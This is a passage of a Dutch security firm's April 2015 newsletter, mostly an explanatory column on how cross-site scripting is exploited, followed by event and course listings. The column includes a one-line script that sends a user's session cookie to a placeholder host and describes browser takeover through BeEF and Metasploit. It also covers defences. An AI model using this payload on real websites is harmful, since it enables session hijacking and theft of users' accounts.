analyse. In combinatie met een forensische analyse van de systemen kan op deze manier goed worden nagegaan wat er is gebeurd. Uit deze analyse kunnen vervolgens weer één of meerdere additionele security incidenten naar voren komen. Bijvoorbeeld een incident waarbij de website door de aanvaller

is voorzien van malware en op deze manier bezoekers probeert te infecteren. Het mooie van incident response is dat naast een directe verlaging van de impact, achteraf veel geleerd kan worden van het security incident. Dit biedt de mogelijkheid verbeteringen door te voeren in IT-beveiligingsprocessen waardoor de kosten (in tijd en geld) van toekomstige incidenten wordt verlaagd. Hierbij kan men denken aan technische maatregelen waardoor de kans op een bepaalde categorie incidenten wordt verlaagd en een betere detectie waardoor de schade kan worden beperkt. Met het gegeven voorbeeld van de website kan het interessant zijn de security monitoring voor de databases te verbeteren. Op deze manier was het mogelijk geweest de exfiltratie van gebruikersgegevens vroegtijdig te detecteren. De komende jaren zullen we zien dat incident response naast protectie en detectie een steeds belangrijkere rol gaat spelen bij organisaties. Het is daarbij belangrijk eerst een goede basis te hebben in de vorm van protectie en detectie alvorens serieus aan response kan worden gedacht. Als alles goed op elkaar is afgestemd biedt response de kans verbeteringen door te voeren op de andere fases en vice versa, met als eindresultaat een continue verbetering van het niveau van beveiliging en een lagere impact van security incidenten.

Aangenaam, mijn naam is Marloes Kwakkel, 34 jaar oud en geboren en getogen in IJsselmuiden. Inmiddels woon ik samen met mijn vriend op een akkerbouwbedrijf in de Noordoostpolder. Na mijn opleiding “Bedrijfskunde en Agribusiness” ben ik begonnen bij Getronics. Hier heb ik de kans gekregen om als consultant aan de slag te gaan. In deze functie heb ik veel te maken gekregen met de onderwerpen bedrijfscontinuïteit, crisismanagement en informatiebeveiliging. Omdat ik graag meer de kant van risicomanagement opwilde, heb ik de overstap gemaakt naar Univé. Daar ben ik werkzaam geweest als Risk & Compliance officer. Hoewel de verbreding mij aansprak, gaf ik toch de voorkeur aan het werken op projectbasis en ben ik ongeveer 3 jaar geleden weer teruggekeerd naar een bestaan als consultant. Recent ben ik in aanraking gekomen met ITSX en dat klikte meteen. Ik ben dan ook erg blij met de start die ik daar op 10 maart jl. heb gemaakt. Ik heb erg veel zin om als Risk Consultant voor ITSX aan de slag te gaan. Marloes Kwakkel Risk Consultant, ITSX [email protected]

i

T

S

X

Madison Gurkha april 2015

11

Dit keer in de rubriek De Hack vertelt Rinke Beimin, security consultant bij Madison Gurkha, meer over het uitbuiten van cross-site-scripting kwetsbaarheden.

D e H ac k

Aanvallen met Cross-site-scripting Veel klanten zijn al bekend met het JavaScript-alert scherm dat door ons wordt gebruikt als bewijs om aan te tonen dat een cross-site-scriptingkwetsbaarheid is gevonden in een webapplicatie. Op zichzelf is dit genoeg bewijs om aan te tonen dat een applicatie kwetsbaar is, er wordt namelijk code uitgevoerd. De gevolgen zijn echter lastig in te schatten. Wat betekent cross-site-scripting eigenlijk? Hoe kan deze simpele popup leiden tot volledige systeemtoegang? En belangrijker: voor wie is het eigenlijk een risico en in welke mate? Dit artikel geeft antwoord op deze vragen.

12

Madison Gurkha april 2015

de h ac k

Terminologie Met het woord ‘scripting’ in de samenstelling cross-sitescripting wordt JavaScript-code bedoelt. JavaScript is een programmeertaal die in webapplicaties wordt gebruikt om dynamische inhoud te creëren, de browser te besturen en om een wisselwerking mogelijk te maken tussen een webapplicatie en een gebruiker. De vertaling van cross-site-scripting is dus: de mogelijkheid om JavaScript-code uit te voeren binnen een website, waarbij de code van buiten de originele website afkomstig is. Het gevaar wordt hiermee al impliciet duidelijk gemaakt: een aanvaller kan willekeurige code uitvoeren in de browser van een gebruiker. Cross-site-scripting wordt afgekort als XSS. Men onderkent twee types XSS: reflected en stored. Bij de reflected versie kan een gebruiker alleen worden aangevallen wanneer deze een URL opvraagt waaraan een aanvaller code heeft toegevoegd. Deze versie van XSS is buitengewoon handig voor (spear)phishing aanvallen, bijvoorbeeld door het opnemen van de URL in een e-mail. Bij stored XSS heeft de aanvaller er voor kunnen zorgen dat JavaScriptcode persistent is opgeslagen in de backend (database) van de webapplicatie. Alle gebruikers die een pagina opvragen die de code bevat, worden aangevallen. Dat de mogelijkheden van JavaScript weinig begrensd zijn, en dat aanvallers buitengewoon creatief zijn in het bedenken van code, zal blijken in de volgende paragrafen. Aanvallen We beschrijven twee soorten praktisch haalbare aanvallen: session hijacking en het verkrijgen van systeemtoegang. Beide aanvallen kunnen worden uitgevoerd met het BeEFframework (The Browser Exploitation Framework Project). Het BeEF-framework is open source software, specifiek ontwikkeld om XSS-kwetsbaarheden uit te buiten. De eerste is relatief simpel, hierbij wordt via XSS de sessiecookie van een gebruiker verstuurd naar een aanvaller, waardoor een aanvaller toegang heeft tot alle functionaliteit en gegevens van de sessie van de gebruiker (session hijacking). De tweede aanval beschrijft een volledige overname van het systeem van een gebruiker, waarbij kwetsbaarheden in de browser software (Firefox, Internet Explorer, etcetera) en browser-toepassingen (Java, Flash, etcetera) worden uitgebuit. U weet wel, die vervelende updates die iedere dag om aandacht vragen.

Session hijacking Wanneer iemand inlogt op een website, hoeft gedurende de sessie maar eenmaal een gebruikersnaam en een wachtwoord te worden ingevoerd. Het feit dat een gebruiker succesvol geauthenticeerd is, wordt vervolgens opgeslagen in een cookie (het sessiecookie). In veel gevallen is dit een lange en moeilijk te raden karakterreeks. JavaScript heeft, wanneer er geen mitigatiemaatregelen zijn getroffen, toegang tot cookies. Dit is mogelijk via het Document Object Model (DOM), wat een hierarchische voorstelling is van de opbouw van een webpagina. Via één regel code kan een sessiecookie worden aangesproken door scripts van een aanvaller. Dit is te zien in afbeelding 1, waarbij via een JavaScript-alert het sessiecookie wordt getoond. Dit sessiecookie kan eenvoudig worden weggesluisd naar een systeem van een aanvaller, bijvoorbeeld door via JavaScript een webserver op te vragen van een aanvaller met de sessiecookie als parameter: <script>window.location=’http://example.com/ xss.php?var=’+document.cookie;. De opslag en verwerking van sessiecookies kan door een aanvaller volledig geautomatiseerd worden.

Systeemovername Het BeEF-framework is een tool die zich concentreert op kwetsbaarheden in de browser en biedt veel mogelijkheden om geavanceerde aanvallen uit te voeren via XSS. Het framework bestaat uit twee onderdelen. Het eerste is een beheerscherm, waar aangevallen browsers worden getoond en waarmee meer geavanceerde aanvallen kunnen worden opgezet. Het tweede onderdeel is een via web opvraagbaar malafide JavaScript-bestand dat gebruikt wordt als XSS-payload. Wanneer deze payload via XSS wordt toegevoegd aan een pagina, en wordt opgevraagd door een gebruiker, wordt het systeem van de gebruiker toegevoegd aan de lijst van browsers in het beheerscherm (zie afbeelding 2). Vervolgens kan het systeem worden geselecteerd en kunnen er aanvallen op worden uitgevoerd. Doordat BeEF geconfigureerd kan worden om te communiceren met het Metasploit-framework,

Madison Gurkha april 2015

13

D e H ac k

is het zelfs mogelijk om via JavaScript buffer overflows uit te buiten. Bij een succesvolle uitbuiting van browser software wordt systeemtoegang verkregen, waardoor als het ware de hele gehardende netwerkomgeving wordt omzeilt. Tijdens de aankomende Black Hat Sessions op 18 juni zal Daniël Dragi cˇevi c´ een concrete aanval presenteren waarmee domeinbeheerdersrechten worden verkregen door te starten met een XSS-aanval.

Bescherming Hoe kunnen XSS-aanvallen worden voorkomen? Verschillende maatregelen kunnen worden toegepast aan zowel de zijde van de server die de webapplicatie aanbiedt (server-side) als aan de zijde van de gebruiker die applicaties benadert (clientside). Een combinatie van maatregelen is het beste.

14

Madison Gurkha april 2015

Server-side XSS-kwetsbaarheden kunnen door de webapplicatie zelf volledig worden voorkomen door consistente encodering (ook wel: HTML-escaping) toe te passen op alle gebruikersinvoer. Immers, als door de aanvaller ingevoerde code niet door de browser als code wordt gezien, wordt het ook niet uitgevoerd. Iedere programmeertaal, en vrijwel ieder framework, biedt meedere mogelijkheden voor correcte escaping. Tevens kunnen mitigatiemaatregelen worden opgenomen in headers in responses die de webserver naar gebruikers stuurt: de cookie-flag HttpOnly zorgt ervoor dat een cookie niet via JavaScript kan worden benaderd en er bestaan meerdere headers die het bereik van JavaScript indammen (https:// www.owasp.org/index.php/List_of_useful_HTTP_headers). Client-side Op het systeem van gebruikers zelf is het allereerst noodzakelijk om alle browser software altijd up-to -date te hebben. Gisteren uitgebrachte versies van Java en Flash kunnen vandaag alweer kwetsbaar zijn. Zorg zowel als gebruiker en als systeembeheerder voor (zeer) regelmatige updates. Tevens bevatten alle moderne browsers modules om JavaScript standaard te deactiveren, en per website waar nodig weer te activeren. Conclusie Wie wordt er (het meest) getroffen bij XSS-aanvallen? In veel gevallen treft uitbuiting door middel van XSS de gebruiker van de webapplicatie, en niet de eigenaar daarvan. Dit kan zowel in persoonlijke als in professionele situaties voorkomen. Het is niet het geval dat onderliggende systemen van de uitbater van de website direct kwetsbaar zijn bij XSS, zoals bijvoorbeeld wel het geval is bij een SQL-injectie- of commandoinjectie-kwetsbaarheid. Via tactisch gebruik van reflected XSS kunnen echter wel specifiek beheerders en ontwikkelaars van webapplicaties worden aangevallen. XSS kan in ieder geval een zeer interessante stepping stone zijn voor verdere aanvallen om snel interne netwerken te benaderen.

wo rksho ps en Cursussen

Van XSS naar domain admin Tijdens de hands-on hacking workshop “Van XSS naar domain admin” leggen security consultants van Madison Gurkha uit hoe een XSS-kwetsbaarheid gebruikt kan worden om domain admin-rechten te krijgen. U leert hands-on welke stappen er nodig zijn en u krijgt handige tips en trucs. De workshop wordt tijdens de Black Hat Sessions tweemaal aangeboden: een ochtendsessie van 10.30 uur tot 12.30 uur en een middagsessie van 13.30 uur tot 15.15 uur. Via het online inschrijfformulier kunt u zich aanmelden voor de workshop. Let op! Er is per workshop ruimte voor maximaal 20 deelnemers. Inschrijving vindt plaats op volgorde van aanmelding.

De cursussen worden georganiseerd bij ITSX, op de campus van The Hague Security Delta. Voor meer informatie kunt u contact opnemen met Thorgal Nicasia via [email protected] of bel naar 06 551 96 550.

22 en 23 april 2015

Vakbeurs Overheid 360° Jaarbeurs Utrecht www.jaarbeursoverheid360.nl 21 en 22 mei 2015

Europese OWASP application security conferentie

11 juni 2015

Tech en Recht Seminar

Het gebruik van encryptie in het dagelijks leven komt steeds vaker voor. Maakt u gebruik van een PGP-sleutel? Dan is dit de kans om uw ‘web-of-trust’ verder uit te breiden. Tijdens de PGP Key Signing Party wordt de gelegenheid geboden om de identiteit en de PGP-sleutel van andere gebruikers te controleren. Hierbij zal ook uitleg gegeven worden over hoe dit proces verloopt en hoe u vervolgens later de PGP-sleutels van de andere gebruikers kunt ondertekenen. De PGP Key Signing Party vindt plaats op 18 juni tijdens de lunchpauze van de Black Hat Sessions. U kunt zich via het online inschrijfformulier hiervoor aanmelden. Na aanmelding ontvangt u van ons meer informatie en verdere instructies. Let op! het aantal plaatsen is beperkt. Heeft u vragen over de PGP Key Signing Party? Stel ze gerust via: keysigning@ madison-gurkha.com.

ITSX’s ‘School of excellence’ start in het najaar haar cursusseizoen met vijf opleidingen. Zie hiernaast voor het overzicht. In tegenstelling tot de in-company trainingen zijn deze dagen open voor alle professionals en bedrijven die hun kennis op het gebied van risicomanagement, informatiebeveiliging en privacy willen vergroten. Alle cursussen worden afgesloten met een examendag waarop het certificaat behaald kan worden.

Hieronder vermelden wij een aantal interessante bijeenkomsten/beurzen die de komende tijd zullen plaatsvinden.

RAI, Amsterdam https://2015.appsec.eu

PGP Key Signing Party

School of excellence

Ag enda

Igluu, Eindhoven http://techenrecht.nl 18 juni 2015

Black Hat Sessions Part XIII Hotel en Congrescentrum de ReeHorst www.blackhatsessions.com 4 en 5 november 2015

Vakbeurs Infosecurity.nl Jaarbeurs Utrecht http://www.infosecurity.nl

ISO 27001/2 Information Security Management Lead Implementer 21 t/m 25 sept. 2015 (4 dagen cursus + 1 examendag) ISO 27001/2 Information Security Management Lead Auditor 28 sept. t/m 2 okt. 2015 (4 dagen cursus + 1 examendag) ISO 27035 Security Incident Management 19 t/m 23 okt. 2015 (4 dagen cursus + 1 examendag) ISO 27005 Information Risk Management 23 nov. t/m 26 nov. 2015 (3 dagen cursus + 1 examendag) ISO 31000 Enterprise Risk Management 30 nov. t/m 3 dec. 2015 (3 dagen cursus + 1 examendag)

het colofon Redactie Rinke Beimin Daniël Dragicˇevic´ Laurens Houben Remco Huisman Matthijs Koot Maayke van Remmen Ward Wouts

Vormgeving & productie Hannie van den Bergh / Studio-HB Foto cover Digidaan

Contactgegevens Madison Gurkha B.V. Postbus 2216 5600 CE Eindhoven Nederland

T +31 40 2377990 F +31 40 2371699 E [email protected]

Bezoekadres Vestdijk 9 5611 CA Eindhoven Nederland

Redactie [email protected]

Voor een digitale versie van de Madison Gurkha Update kunt u terecht op www.madison-gurkha.com. Aan zowel de fysieke als de digitale uitgave kunnen geen rechten worden ontleend.

Madison Gurkha april 2015

15

Black Hat Sessions XIII 18 juni 2015 | De Reehorst | Ede

o rgan i s at i e

Op 18 juni 2015 organiseert Madison Gurkha alweer de dertiende editie van de inmiddels befaamde Black Hat Sessions. Het thema van deze editie luidt: Hoe veilig is (IT in) Nederland? Een breed en uitermate relevant thema. Want overal waar je kijkt speelt IT een hoofdrol.

Your Security is Our Business

Via het inschrijfformulier op www.blackhatsessions.com kunt u zich direct aanmelden. Voor de kortingscode en groepskortingen zie pag. 5.

Eric Luiijf (keynote) TNO

K. Reid Wightman Digital Bond Labs

Hans de Vries (keynote) NCSC

Maciej Korczynski TU Delft

Teun van Dongen

Alex Bik BIT

Ed de Myttenaere NRG

Paul van der Ploeg NRG

Daniël Dragiˇ c evic´ Madison Gurkha

Alexander Polyakov ERPscan

Dmitry Chastuchin ERPscan

Erwin Kooi Alliander

h oof d spo n so r e n

Ho o fd mediapartner

s p on s o rs

Media/kennispartner s

NOREA

0001 1001 1001 0011

DE BEROEPSORGANISATIE VAN IT-AUDITORS

Platform voor IT-professionals